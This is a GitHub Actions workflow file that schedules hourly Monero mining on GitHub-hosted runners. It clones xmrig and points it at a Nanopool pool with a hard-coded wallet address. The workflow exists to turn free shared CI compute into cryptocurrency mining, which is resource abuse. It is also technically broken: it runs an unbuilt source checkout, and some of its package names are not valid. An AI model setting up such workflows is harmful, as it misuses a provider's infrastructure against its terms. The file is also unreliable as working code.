name: Mine Monero

on:
  schedule:
    - cron: '0 * * * *'  # Runs every hour

jobs:
  mine:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install dependencies
        run: |
          sudo apt-get update
          sudo apt-get install -y git wget curl nano vim htop unzip zip tar clang make python3 cmake libuv openssl openssh proot

      - name: Clone and run xmrig
        run: |
          git clone https://github.com/xmrig/xmrig.git
          cd xmrig
          ./xmrig -o stratum+ssl://xmr-asia1.nanopool.org:10343 -a randomx -u 84YR3pqYSCo84Ym1NfjFyeFxZV7fVHHF6Qet5FRbLfaSdXJp8qZAq8nAeSeoK5PpKP8oLRMkDSYFa18u8z1duesmDGCbket -p x --tls
